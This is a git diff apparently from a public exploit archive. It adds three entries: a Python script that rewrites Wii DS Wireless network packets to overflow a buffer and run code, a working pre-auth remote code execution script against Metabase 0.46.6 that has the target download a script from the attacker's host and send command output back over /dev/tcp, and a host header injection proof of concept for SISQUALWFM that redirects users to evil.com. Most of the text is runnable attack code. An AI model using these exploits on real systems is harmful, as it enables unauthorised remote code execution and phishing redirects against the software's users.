diff --git a/exploits/hardware/local/51798.py b/exploits/hardware/local/51798.py new file mode 100755 index 000000000..d2cd8322e --- /dev/null +++ b/exploits/hardware/local/51798.py @@ -0,0 +1,68 @@ +# Exploit Title: DS Wireless Communication Remote Code Execution +# Date: 11 Oct 2023 +# Exploit Author: MikeIsAStar +# Vendor Homepage: https://www.nintendo.com +# Version: Unknown +# Tested on: Wii +# CVE: CVE-2023-45887 + +"""This code will inject arbitrary code into a client's game. + +You are fully responsible for all activity that occurs while using this code. +The author of this code can not be held liable to you or to anyone else as a +result of damages caused by the usage of this code. +""" + +import re +import sys + +try: + import pydivert +except ModuleNotFoundError: + sys.exit("The 'pydivert' module is not installed !") + + +# Variables +LR_SAVE = b'\x41\x41\x41\x41' +assert len(LR_SAVE) == 0x04 +PADDING = b'MikeStar' +assert len(PADDING) > 0x00 + +# Constants +DWC_MATCH_COMMAND_INVALID = b'\xFE' +PADDING_LENGTH = 0x23C +FINAL_KEY = b'\\final\\' +WINDIVERT_FILTER = 'outbound and tcp and tcp.PayloadLength > 0' + + +def try_modify_payload(payload): + message_pattern = rb'\\msg\\GPCM([1-9][0-9]?)vMAT' + message = re.search(message_pattern, payload) + if not message: + return None + + payload = payload[:message.end()] + payload += DWC_MATCH_COMMAND_INVALID + payload += (PADDING * (PADDING_LENGTH // len(PADDING) + 1))[:PADDING_LENGTH] + payload += LR_SAVE + payload += FINAL_KEY + return payload + + +def main(): + try: + with pydivert.WinDivert(WINDIVERT_FILTER) as packet_buffer: + for packet in packet_buffer: + payload = try_modify_payload(packet.payload) + if payload is not None: + print('Modified a GPCM message !') + packet.payload = payload + packet_buffer.send(packet) + except KeyboardInterrupt: + pass + except PermissionError: + sys.exit('This program must be run with administrator privileges !') + + +if __name__ == '__main__': + main() \ No newline at end of file diff --git a/exploits/linux/webapps/51797.py b/exploits/linux/webapps/51797.py new file mode 100755 index 000000000..0989d44cb --- /dev/null +++ b/exploits/linux/webapps/51797.py @@ -0,0 +1,165 @@ +# Exploit Title: metabase 0.46.6 - Pre-Auth Remote Code Execution +# Google Dork: N/A +# Date: 13-10-2023 +# Exploit Author: Musyoka Ian +# Vendor Homepage: https://www.metabase.com/ +# Software Link: https://www.metabase.com/ +# Version: metabase 0.46.6 +# Tested on: Ubuntu 22.04, metabase 0.46.6 +# CVE : CVE-2023-38646 + +#!/usr/bin/env python3 + +import socket +from http.server import HTTPServer, BaseHTTPRequestHandler +from typing import Any +import requests +from socketserver import ThreadingMixIn +import threading +import sys +import argparse +from termcolor import colored +from cmd import Cmd +import re +from base64 import b64decode + + +class Termial(Cmd): + prompt = "metabase_shell > " + def default(self,args): + shell(args) + + +class Handler(BaseHTTPRequestHandler): + def do_GET(self): + global success + if self.path == "/exploitable": + + self.send_response(200) + self.end_headers() + self.wfile.write(f"#!/bin/bash\n$@ | base64 -w 0 > /dev/tcp/{argument.lhost}/{argument.lport}".encode()) + success = True + + else: + print(self.path) + #sys.exit(1) + def log_message(self, format: str, *args: Any) -> None: + return None + +class Server(HTTPServer): + pass + +def run(): + global httpserver + httpserver = Server(("0.0.0.0", argument.sport), Handler) + httpserver.serve_forever() + +def exploit(): + global success, setup_token + print(colored("[*] Retriving setup token", "green")) + setuptoken_request = requests.get(f"{argument.url}/api/session/properties") + setup_token = re.search('"setup-token":"(.*?)"', setuptoken_request.text, re.DOTALL).group(1) + print(colored(f"[+] Setup token: {setup_token}", "green")) + print(colored("[*] Tesing if metabase is vulnerable", "green")) + payload = { + "token": setup_token, + "details": + { + "is_on_demand": False, + "is_full_sync": False, + "is_sample": False, + "cache_ttl": None, + "refingerprint": False, + "auto_run_queries": True, + "schedules": + {}, + "details": + { + "db": f"zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER IAMPWNED BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\nnew java.net.URL('http://{argument.lhost}:{argument.sport}/exploitable').openConnection().getContentLength()\n$$--=x\\;", + "advanced-options": False, + "ssl": True + }, + "name": "an-sec-research-musyoka", + "engine": "h2" + } + } + timer = 0 + print(colored(f"[+] Starting http server on port {argument.sport}", "blue")) + thread = threading.Thread(target=run, ) + thread.start() + while timer != 120: + test = requests.post(f"{argument.url}/api/setup/validate", json=payload) + if success == True : + print(colored("[+] Metabase version seems exploitable", "green")) + break + elif timer == 120: + print(colored("[-] Service does not seem exploitable exiting ......", "red")) + sys.exit(1) + + print(colored("[+] Exploiting the server", "red")) + + + terminal = Termial() + terminal.cmdloop() + + +def shell(command): + global setup_token, payload2 + payload2 = { + "token": setup_token, + "details": + { + "is_on_demand": False, + "is_full_sync": False, + "is_sample": False, + "cache_ttl": None, + "refingerprint": False, + "auto_run_queries": True, + "schedules": + {}, + "details": + { + "db": f"zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('curl {argument.lhost}:{argument.sport}/exploitable -o /dev/shm/exec.sh')\n$$--=x", + "advanced-options": False, + "ssl": True + }, + "name": "an-sec-research-team", + "engine": "h2" + } + } + + output = requests.post(f"{argument.url}/api/setup/validate", json=payload2) + bind_thread = threading.Thread(target=bind_function, ) + bind_thread.start() + #updating the payload + payload2["details"]["details"]["db"] = f"zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash /dev/shm/exec.sh {command}')\n$$--=x" + requests.post(f"{argument.url}/api/setup/validate", json=payload2) + #print(output.text) + + +def bind_function(): + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.bind(("0.0.0.0", argument.lport)) + sock.listen() + conn, addr = sock.accept() + data = conn.recv(10240).decode("ascii") + print(f"\n{(b64decode(data)).decode()}") + except Exception as ex: + print(colored(f"[-] Error: {ex}", "red")) + pass + + + +if __name__ == "__main__": + print(colored("[*] Exploit script for CVE-2023-38646 [Pre-Auth RCE in Metabase]", "magenta")) + args = argparse.ArgumentParser(description="Exploit script for CVE-2023-38646 [Pre-Auth RCE in Metabase]") + args.add_argument("-l", "--lhost", metavar="", help="Attacker's bind IP Address", type=str, required=True) + args.add_argument("-p", "--lport", metavar="", help="Attacker's bind port", type=int, required=True) + args.add_argument("-P", "--sport", metavar="", help="HTTP Server bind port", type=int, required=True) + args.add_argument("-u", "--url", metavar="", help="Metabase web application URL", type=str, required=True) + argument = args.parse_args() + if argument.url.endswith("/"): + argument.url = argument.url[:-1] + success = False + exploit() \ No newline at end of file diff --git a/exploits/multiple/webapps/51796.txt b/exploits/multiple/webapps/51796.txt new file mode 100644 index 000000000..c98a6c4ab --- /dev/null +++ b/exploits/multiple/webapps/51796.txt @@ -0,0 +1,102 @@ +# Exploit Title: SISQUALWFM 7.1.319.103 Host Header Injection +# Discovered Date: 17/03/2023 +# Reported Date: 17/03/2023 +# Resolved Date: 13/10/2023 +# Exploit Author: Omer Shaik (unknown_exploit) +# Vendor Homepage: https://www.sisqualwfm.com +# Version: 7.1.319.103 +# Tested on: SISQUAL WFM 7.1.319.103 +# Affected Version: sisqualWFM - 7.1.319.103 +# Fixed Version: sisqualWFM - 7.1.319.111 +# CVE : CVE-2023-36085 +# CVSS: 3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N +# Category: Web Apps + + + + +A proof-of-concept(POC) scenario that demonstrates a potential host header injection vulnerability in sisqualWFM version 7.1.319.103, specifically targeting the /sisqualIdentityServer/core endpoint. This vulnerability could be exploited by an attacker to manipulate webpage links or redirect users to another site with ease, simply by tampering with the host header. + +**************************************************************************************************** +Orignal Request +**************************************************************************************************** +GET /sisqualIdentityServer/core/login HTTP/2 +Host: sisqualwfm.cloud +Cookie: +Sec-Ch-Ua: "Not A(Brand";v="24", "Chromium";v="110" +Sec-Ch-Ua-Mobile: ?0 +Sec-Ch-Ua-Platform: "Linux" +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Sec-Fetch-Site: none +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 + +**************************************************************************************************** +Orignal Response +**************************************************************************************************** +HTTP/2 302 Found +Cache-Control: no-store, no-cache, must-revalidate +Location: https://sisqualwfm.cloud/sisqualIdentityServer/core/ +Strict-Transport-Security: max-age=31536000; includeSubDomains; preload +X-Content-Type-Options: nosniff +X-Frame-Options: sameorigin +Date: Wed, 22 Mar 2023 13:22:10 GMT +Content-Length: 0 +**************************************************************************************************** + + + + +██████╗ ██████╗ ██████╗ +██╔══██╗██╔═══██╗██╔════╝ +██████╔╝██║ ██║██║ +██╔═══╝ ██║ ██║██║ +██║ ╚██████╔╝╚██████╗ +╚═╝ ╚═════╝ ╚═════╝ + + + + +**************************************************************************************************** +Request has been modified to redirect user to evil.com (Intercepted request using Burp proxy) +**************************************************************************************************** +GET /sisqualIdentityServer/core/login HTTP/2 +Host: evil.com +Cookie: +Sec-Ch-Ua: "Not A(Brand";v="24", "Chromium";v="110" +Sec-Ch-Ua-Mobile: ?0 +Sec-Ch-Ua-Platform: "Linux" +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Sec-Fetch-Site: none +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 + +**************************************************************************************************** +Response +**************************************************************************************************** +HTTP/2 302 Found +Cache-Control: no-store, no-cache, must-revalidate +Location: https://evil.com/sisqualIdentityServer/core/ +Strict-Transport-Security: max-age=31536000; includeSubDomains; preload +X-Content-Type-Options: nosniff +X-Frame-Options: sameorigin +Content-Length: 0 + + +**************************************************************************************************** +Method of Attack +**************************************************************************************************** + +curl -k --header "Host: attack.host.com" "Domain Name + /sisqualIdentityServer/core" -vvv + +**************************************************************************************************** \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index e8a509c01..be86eb811 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -3259,6 +3259,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 34954,exploits/hardware/local/34954.txt,"Cisco Unified Communications Manager 8.0 - Invalid Argument Privilege Escalation",2010-11-03,"Knud Erik Hjgaard",local,hardware,,2010-11-03,2014-10-14,1,CVE-2010-3039;OSVDB-69158,,,,,https://www.securityfocus.com/bid/44672/info 50773,exploits/hardware/local/50773.sh,"Cyclades Serial Console Server 3.3.0 - Local Privilege Escalation",2022-02-21,ibby,local,hardware,,2022-02-21,2022-02-21,0,,,,,, 24899,exploits/hardware/local/24899.txt,"Draytek Vigor 3900 1.06 - Local Privilege Escalation",2013-03-29,"Mohammad abou hayt",local,hardware,,2013-03-29,2013-03-29,0,OSVDB-91811,,,,, +51798,exploits/hardware/local/51798.py,"DS Wireless Communication - Remote Code Execution",2024-02-15,MikeIsAStar,local,hardware,,2024-02-15,2024-02-15,0,,,,,, 50283,exploits/hardware/local/50283.txt,"ECOA Building Automation System - Missing Encryption Of Sensitive Information",2021-09-13,Neurogenesia,local,hardware,,2021-09-13,2021-09-13,0,,,,,, 51414,exploits/hardware/local/51414.py,"FS-S3900-24T4S - Privilege Escalation",2023-05-02,"Daniele Linguaglossa",local,hardware,,2023-05-02,2023-05-02,0,CVE-2023-30350,,,,, 44306,exploits/hardware/local/44306.c,"Huawei Mate 7 - '/dev/hifi_misc' Privilege Escalation",2016-01-24,pray3r,local,hardware,,2018-03-19,2018-03-19,0,CVE-2015-8088,,,,,https://github.com/hardenedlinux/offensive_poc/blob/0cfe3764a0388e3715b018d1d59ef801f8b16b73/CVE-2015-8088/cve-2015-8088-poc.c @@ -8945,6 +8946,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 10433,exploits/linux/webapps/10433.txt,"Mail Manager Pro - Cross-Site Request Forgery (Change Admin Password)",2009-12-14,"Milos Zivanovic",webapps,linux,80,2009-12-13,,1,OSVDB-61052;CVE-2009-4827,,,,, 14818,exploits/linux/webapps/14818.pl,"McAfee LinuxShield 1.5.1 - Local/Remote File Inclusion / Remote Code Execution",2010-08-27,"Nikolas Sotiriu",webapps,linux,,2010-08-27,2017-07-19,0,,,,,, 44681,exploits/linux/webapps/44681.txt,"Merge PACS 7.0 - Cross-Site Request Forgery",2018-05-21,"Safak Aslan",webapps,linux,,2018-05-21,2018-06-15,0,,"Cross-Site Request Forgery (CSRF)",,,, +51797,exploits/linux/webapps/51797.py,"Metabase 0.46.6 - Pre-Auth Remote Code Execution",2024-02-15,"Musyoka Ian",webapps,linux,,2024-02-15,2024-02-15,0,,,,,, 46450,exploits/linux/webapps/46450.txt,"Micro Focus Filr 3.4.0.217 - Path Traversal / Local Privilege Escalation",2019-02-22,SecureAuth,webapps,linux,,2019-02-22,2019-02-22,1,CVE-2019-3475;CVE-2019-3474,Traversal,,,,https://www.secureauth.com/labs/advisories/micro-focus-filr-multiple-vulnerabilities 47457,exploits/linux/webapps/47457.py,"mintinstall 7.9.9 - Code Execution",2019-10-03,"İbrahim Hakan Şeker",webapps,linux,,2019-10-03,2019-10-03,0,CVE-2019-17080,,,,, 28653,exploits/linux/webapps/28653.txt,"mod_accounting Module 0.5 - Blind SQL Injection",2013-09-30,Wireghoul,webapps,linux,,2013-09-30,2013-09-30,0,CVE-2013-5697;OSVDB-97588,,,,, @@ -12176,6 +12178,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 51150,exploits/multiple/webapps/51150.txt,"Shoplazza 1.1 - Stored Cross-Site Scripting (XSS)",2023-03-30,"Andrey Stoykov",webapps,multiple,,2023-03-30,2023-03-30,0,,,,,, 48712,exploits/multiple/webapps/48712.txt,"Sickbeard 0.1 - Cross-Site Request Forgery (Disable Authentication)",2020-07-26,bdrake,webapps,multiple,,2020-07-26,2020-07-26,0,,,,,, 50073,exploits/multiple/webapps/50073.txt,"Simple Traffic Offense System 1.0 - Stored Cross Site Scripting (XSS)",2021-06-30,"Barış Yıldızoğlu",webapps,multiple,,2021-06-30,2021-06-30,0,,,,,, +51796,exploits/multiple/webapps/51796.txt,"SISQUALWFM 7.1.319.103 - Host Header Injection",2024-02-15,"Omer Shaik",webapps,multiple,,2024-02-15,2024-02-15,0,,,,,, 33717,exploits/multiple/webapps/33717.txt,"Six Apart Vox - 'search' Page Cross-Site Scripting",2010-03-05,Phenom,webapps,multiple,,2010-03-05,2014-06-12,1,,,,,,https://www.securityfocus.com/bid/38575/info 49415,exploits/multiple/webapps/49415.py,"SmartAgent 3.1.0 - Privilege Escalation",2021-01-12,"Orion Hridoy",webapps,multiple,,2021-01-12,2021-01-12,0,,,,,, 48580,exploits/multiple/webapps/48580.py,"SmarterMail 16 - Arbitrary File Upload",2020-06-12,vvhack.org,webapps,multiple,,2020-06-12,2020-06-12,0,,,,,,